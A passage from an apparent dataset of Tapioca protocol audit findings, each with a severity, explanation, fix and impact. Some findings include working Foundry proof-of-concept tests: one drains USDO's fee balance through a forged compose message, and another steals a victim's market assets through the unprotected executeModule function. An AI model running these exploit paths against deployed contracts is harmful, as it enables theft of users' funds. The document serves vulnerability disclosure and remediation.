_internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // rest of code\\n }\\n\\nfunction _internalTransferWithAllowance(address _owner, address srcChainSender, uint256 _amount) internal {\\n \\n if (_owner != srcChainSender) { // <------- `_owner` and `srcChainSender` will both be the USDO address, so the check in `_spendAllowance()` won't be performed\\n _spendAllowance(_owner, srcChainSender, _amount);\\n }\\n \\n _transfer(_owner, address(this), _amount);\\n } \\n```\\n\\nAfter burning the tokens from USDO, the remote transfer will trigger a call to a destination chain to mint the burnt tokens in the origin chain. The receiver of the tokens can be different from the address whose tokens were burnt, so an attacker can obtain the minted tokens in the destination chain, effectively stealing all USDO balance from the USDO contract.\\nAn example attack path would be:\\nAn attacker creates a compose call from chain A to chain B. This compose call is actually composed of two messages:\\nThe first message, which won't affect the attack and is simply the initial step to trigger the attack in the destination chain\\nThe second message (nextMsg), which is the actual compose message that will trigger the remote transfer and burn the tokens in chain B, and finally trigger a call back to chain A to mint he tokens\\nThe call is executed, chain B receives the call and triggers the first compose message (as demonstrated in the PoC, this first message is not important and can simply be a remote transfer call with a 0 amount of tokens). After triggering the first compose call, the second compose message is triggered. The USDO contract is set as the source chain sender and the remote transfer is called. Because the owner set in the compose call and the source chain sender are the same, the specified tokens in the remote transfer are directly burnt\\nFinally, the compose call triggers a call back to chain A to mint the burnt tokens in chain B, and tokens are minted to the attacker\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_USDOBorrowFeesCanBeDrained() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n // Mock generated fees\\n deal(address(bUsdo), address(bUsdo), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // NEXT MESSAGE B --> A (EXECUTED AS THE nextMsg after the INITIAL B --> A MESSAGE) \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: address(bUsdo), // IMPORTANT: This will make the attack be triggered as bUsdo will become the srcChainSender in the nextMsg compose call\\n composeMsg: bytes(\"\"),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes(\"\") // next message\\n );\\n \\n // SECOND MESSAGE (composed) B ---> A \\n // This second message is a necessary step in order to reach the execution\\n // inside `_lzCompose()` where the nextMsg can be triggered\\n\\n SendParam memory sendParamBToA = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(address(aUsdo)),\\n amountLD: 0, \\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(\"attacker\"),\\n composeMsg: bytes(\"\"),\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n toeComposeMsgVictim // next message: IMPORTANT to set this to the A --> B message that will be triggered as the `nextMsg`\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")), // address here doesn't matter\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n vm.startPrank(makeAddr(\"attacker\"));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")), // initially, the sender for the first A --> B message is the attacker\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // bUsdo will be burnt from the bUSDO address, and nextMsg will be triggered to mint the burnt amount in chain A, having \\n // the attacker as the receiver\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Receive nextMsg in chain A, mint tokens to the attacker\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, aUsdo.decimalConversionRate());\\n\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n \\n\\n // Finished: bUSDO fees get drained, attacker obtains all the fees in the form of aUSDO\\n assertEq(bUsdo.balanceOf(address(bUsdo)), 0);\\n assertEq(aUsdo.balanceOf(makeAddr(\"attacker\")), 100 ether);\\n \\n }\\n```\\n\\nRun the poc with the following command: `forge test --mt testVuln_USDOBorrowFeesCanBeDrained`\\nThe proof of concept shows how in the end, USDO's `bUsdo` balance will become 0, while the same amount ofaUsdo in chain A will be minted to the attacker.чEnsure that the `_lzCompose()` call triggered when a `_nextMsg` exists keeps a consistent source chain sender address, instead of hardcoding it to `address(this)` :\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // rest of code\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n// Remove the line below\\n _lzCompose(address(this), _guid, nextMsg_);‚\\n// Add the line below\\n _lzCompose(srcChainSender_, _guid, nextMsg_);\\n }\\n }\\n```\\nчHigh, all fees generated by the USDO contract can be effectively stolen by the attackerч```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n -Unprotected `executeModule` function allows to steal the tokensчhighчThe `executeModule` function allows anyone to execute any module with any params. That allows attacker to execute operations on behalf of other users.\\nHere is the `executeModule` function:\\nAll its parameters are controlled by the caller and anyone can be the caller. Anyone can execute any module on behalf of any user.\\nLet's try to steal someone's tokens using `UsdoMarketReceiver` module and `removeAssetReceiver` function (below is the PoC).\\nHere is the code that will call the `executeModule` function:\\n```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n\\nThe important value here is the `marketMsg_` parameter. The `removeAssetReceiver` function forwards the call to `exitPositionAndRemoveCollateral` function via magnetar contract.\\nThe `exitPositionAndRemoveCollateral` function removes asset from Singularity market if the `data.removeAndRepayData.removeAssetFromSGL` is `true`. The amount is taken from `data.removeAndRepayData.removeAmount`. Then, if `data.removeAndRepayData.assetWithdrawData.withdraw` is `true`, the `_withdrawToChain` is called.\\nIn `_withdrawToChain`, if the `data.lzSendParams.sendParam.dstEid` is zero, the `_withdrawHere` is called that transfers asset to `data.lzSendParams.sendParam.to`.\\nSumming up, the following `marketMsg_` struct can be used to steal userB's assets from singularity market by `userA`.\\n```\\nMarketRemoveAssetMsg({\\n user: address(userB),//victim\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,//remove from Singularity market\\n removeAmount: tokenAmountSD,//amount to remove\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,//withdraw assets\\n yieldBox: address(yieldBox), //where from to withdraw\\n assetId: bUsdoYieldBoxId, //what asset to withdraw\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // recipient of the assets\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n })\\n })\\n});\\n```\\n\\nHere is the modified version of the `test_market_remove_asset` test that achieves the same result, but with unauthorized call to `executeModule` function. The `userA` is the attacker, and `userB` is the victim.\\n```\\n function test_malicious_market_remove_asset() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n // setup\\n {\\n deal(address(bUsdo), address(userB), erc20Amount_);\\n\\n vm.startPrank(userB);\\n bUsdo.approve(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(bUsdoYieldBoxId, address(userB), address(userB), erc20Amount_, 0);\\n\\n uint256 sh = yieldBox.toShare(bUsdoYieldBoxId, erc20Amount_, false);\\n yieldBox.setApprovalForAll(address(pearlmit), true);\\n pearlmit.approve(\\n address(yieldBox), bUsdoYieldBoxId, address(singularity), uint200(sh), uint48(block.timestamp + 1)\\n );\\n singularity.addAsset(address(userB), address(userB), false, sh);\\n vm.stopPrank();\\n }\\n\\n uint256 tokenAmount_ = 0.5 ether;\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(tokenAmount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n vm.startPrank(userB);\\n bUsdo.approve(address(magnetar), type(uint256).max);\\n singularity.approve(address(magnetar), type(uint256).max);\\n vm.stopPrank();\\n \\n MarketRemoveAssetMsg memory marketMsg = MarketRemoveAssetMsg({\\n user: address(userB),\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,\\n removeAmount: tokenAmountSD,\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,\\n yieldBox: address(yieldBox),\\n assetId: bUsdoYieldBoxId,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // transfer to attacker\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n })\\n })\\n });\\n bytes memory marketMsg_ = usdoHelper.buildMarketRemoveAssetMsg(marketMsg);\\n\\n\\n // I added _checkSender in MagnetarMock (function exitPositionAndRemoveCollateral) so need to whitelist USDO\\n cluster.updateContract(aEid, address(bUsdo), true);\\n\\n // ----- ADDED THIS ------>\\n // Attack using executeModule\\n // ------------------------\\n vm.startPrank(userA);\\n bUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n // ------------------------\\n\\n // Check execution\\n {\\n assertEq(bUsdo.balanceOf(address(userB)), 0);\\n assertEq(\\n yieldBox.toAmount(bUsdoYieldBoxId, yieldBox.balanceOf(address(userB), bUsdoYieldBoxId), false),\\n 0\\n );\\n assertEq(bUsdo.balanceOf(address(userA)), tokenAmount_);\\n }\\n }\\n```\\n\\nNote: The `burst` function was modified in the MagnetarMock contract and add call to `_checkSender` function to reproduce the real situation.\\nThat is also why the `bUsdo` has been whitelisted in the test.чThe `executeModule` function should inspect and validate the `_data` parameter to make sure that the caller is the same address as the user who executes the operations.чHIGH - Anyone can steal others' tokens from their markets.ч```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n -Pending allowances can be exploitedчhighчPending allowances can be exploited in multiple places in the codebase.\\n`TOFT::marketRemoveCollateralReceiver` has the following flow:\\nIt calls `removeCollateral` ona a market with the following parameters: `from = msg_user`, `to = msg_.removeParams.magnetar`.\\nInside the `SGLCollateral::removeCollateral` `_allowedBorrow` is called and check if the `from = msg_user` address has given enough `allowanceBorrow` to the `msg.sender` which in this case is the TOFT contract.\\nSo for a user to use this flow in needs to call:\\n```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n\\nAnd give the needed allowance to the TOFT contract.\\nThis results in collateral being removed and transferred into the Magnetar contract with `yieldBox.transfer(address(this), to, collateralId, share);`.\\nThe Magnetar gets the collateral, and it can withdraw it to any address specified in the `msg_.withdrawParams`.\\nThis is problematic as the `TOFT::marketRemoveCollateralReceiver` doesn't check the `msg.sender`. In practice this means if Alice has called `approveBorrow` and gives the needed allowance with the intention of using the `marketRemoveCollateralReceiver` flow, Bob can use the `marketRemoveCollateralReceiver` flow and withdraw all the collateral from Alice to his address.\\nSo, any pending allowances from any user can immediately be exploited to steal the collateral.\\nOther occurrences\\nThere are a few other occurrences of this problematic pattern in the codebase.\\n`TOFT::marketBorrowReceiver` expects the user to give an approval to the Magnetar contract. The approval is expected inside the `_extractTokens` function where `pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);` is called. Again, the `msg.sender` is not checked inside the `marketBorrowReceiver` function, so this flow can be abused by another user to borrow and withdraw the borrowed amount to his address.\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` also allows to borrow inside the BigBang market and withdraw the borrowed amount to an arbitrary address.\\n`TOF::exerciseOptionsReceiver` has the `_internalTransferWithAllowance` function that simply allows to transfer TOFT tokens from any `_options.from` address that has given an allowance to `srcChainSender`, by anyone that calls this function. It allows to forcefully call the `exerciseOptionsReceiver` on behalf of any other user.\\n`USDO::depositLendAndSendForLockingReceiver` also expects the user to give an allowance to the Magnetar contract, i.e. `MagnetarAssetXChainModule::depositYBLendSGLLockXchainTOLP` calls the `_extractTokens`.чThere are multiple instances of issues with dangling allowances in the protocol. Review all the allowance flows and make sure it can't be exploited.чThe impact of this vulnerability is that any pending allowances from any user can immediately be exploited to steal the collateral/borrowed amount.ч```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n -Incorrect `tapOft` Amounts Will Be Sent to Desired Chains on Certain ConditionsчmediumчTOFTOptionsReceiverModule::exerciseOptionsReceiver module, is responsible for facilitating users' token exercises between `mTOFT` and `tapOFT` tokens across different chains. In a `msg-type` where the user wishes to receive the `tapOFT` tokens on a different chain, the module attempts to ensure the amount sent to the user on the desired chain, aligns with the received tap amount in the current chain. However, a flaw exists where the computed amount to send is not updated in the send parameters, resulting in incorrect token transfer.\\nTOFTOptionsReceiverModule::exerciseOptionsReceiver module is a module that enables users to exercise their `mTOFT` tokens for a given amount of `tapOFT` option tokens.\\nWhen the user wishes to withdraw these `tapOft` tokens on a different chain, the withdrawOnOtherChain param will be set to true. For this composed call type, the contract attempts to ensure the amount to send to the user on the other chain isn't more than the received `tap amount`, by doing this:\\n```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n\\nThe issue here is that, the computed amount to send, is never updated in the `lsSendParams.sendParam`, the current code still goes on to send the packet to the destination chain with the default input amount:\\n```\\n if (msg_.withdrawOnOtherChain) {\\n /// @dev determine the right amount to send back to source\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n\\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from);\\n\\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n```\\n\\nTo Illustrate:\\nassuming send `amountLD` = 100 and the user is to receive a tap amount of = 80 since `amountLD` is greater than tap amount, the amount to send should be 80, i.e. `msg_.lzSendParams.sendParam.amountLD` = 80 The current code goes on to send the default 100 to the user, when the user is only entitled to 80чupdate the lz send param `amountLD` to the new computed `amountToSend` before sending the packet\\nI.e :\\n```\\nmsg_.lzSendParams.sendParam.amountLD = amountToSend;\\n```\\n\\nNote that the issue should also be fixed in Tapioca-Bar as wellчThe user will always receive an incorrect amount of `tapOFT` in the desired chain whenever `amountLD` is greater than `tapAmount`ч```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n -Underflow Vulnerability in `Market::_allowedBorrow` Function: Oversight with Pearlmit Allowance HandlingчmediumчThe protocol permits users to authorize spenders using the MarketERC20::approveBorrow function, and also includes support for allowances granted through the `Pearlmit` contract. However, an oversight in the _allowedBorrow function leads to an underflow issue when spenders utilize `Pearlmit` allowances, rendering them unable to execute borrowing actions despite having the necessary permission.\\nProtocol users can approve a spender via MarketERC20::approveBorrow function, to perform certain actions like `borrow`, `repay` or adding of collateral on their behalf. Whenever the spender calls any of these functionalities, down the execution _allowedBorrow is invoked to check if the caller is allowed to `borrow` `share` `from` `from`, and then decrease the spender's allowance by the `share` amount.\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nThe problem here is, _allowedBorrow will always revert due to an underflow whenever the spender is given an allowance in the `Pearlmit` contract.\\nTo Illustrate\\nAssuming we have two users, Bob and Alice, since `Pearlmit` allowance is also accepted, Alice grants Bob a borrowing allowance of `100` tokens for the collateral id using `Pearlmit`. Note that Bob's allowance in the Market contract for Alice will be `zero(0)` and `100` in `Pearlmit`.\\nWhen Bob tries to borrow an amount equal to his `Pearlmit` allowance, down the borrow logic `_allowedBorrow` is called, in `_allowedBorrow` function, the below requirement passes, since the returned `pearlmitAllowed` for Bob will equal `100` shares\\n```\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n```\\n\\nRemember Bob's allowance in the Market contract for Alice is `0`, but `100` in `Pearlmit`, but _allowedBorrow function erroneously attempts to deduct the share from Bob's Market allowance, which will thus result in an underflow revert(0 - 100).\\n```\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n```\\nчAfter ensuring that the user has got the approval, return when permission from `Pearlmit` is used:\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n+ if (pearlmitAllowed != 0) return;\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nOr remove support for `Pearlmit` allowanceчAlthough giving a spender allowance via `Pearlmit` will appear to be supported, the spender cannot carry out any borrowing action in the Market.ч```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n -The repaying action in `BBLeverage.sellCollateral` function pulls YieldBox shares of asset from wrong addressчmediumчThe `sellCollateral` function is used to sell a user's collateral to obtain YieldBox shares of the asset and repay the user's loan. However, in the BBLeverage contract, it calls `_repay` with the `from` parameter set to the user, even though the asset shares have already been collected by this contract beforehand.\\nIn `BBLeverage.sellCollateral`, the `from` variable (user) is used as the repayer address.\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n\\nTherefore, asset shares of user will be pulled in `BBLendingCommon._repay` function.\\n```\\nfunction _repay(address from, address to, uint256 part) internal returns (uint256 amount) {\\n // rest of code\\n // @dev amount includes the opening & accrued fees\\n yieldBox.withdraw(assetId, from, address(this), amount, 0);\\n // rest of code\\n```\\n\\nThis is incorrect behavior since the necessary asset shares were already collected by the contract in the `BBLeverage.sellCollateral` function. The repayer address should be `address(this)` for `_repay`.чShould fix as following:\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(address(this), from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(address(this), from, partOut);\\n}\\n```\\nчMistakenly pulling user funds while the received asset shares remain stuck in the contract will result in losses for users who have sufficient allowance and balance when using the `BBLeverage.sellCollateral` functionality.ч```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n -`leverageAmount` is incorrect in `SGLLeverage.sellCollateral` function due to calculation based on the new states of YieldBox after withdrawalчmediumчSee vulnerability detail\\n`SGLLeverage.sellCollateral` function attempts to remove the user's collateral in shares of YieldBox, then withdraws those collateral shares to collect collateral tokens. Subsequently, the received collateral tokens can be used to swap for asset tokens.\\nHowever, the `leverageAmount` variable in this function does not represent the actual withdrawn tokens from the provided shares because it is calculated after the withdrawal.\\n```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n\\n`yieldBox.toAmount` after 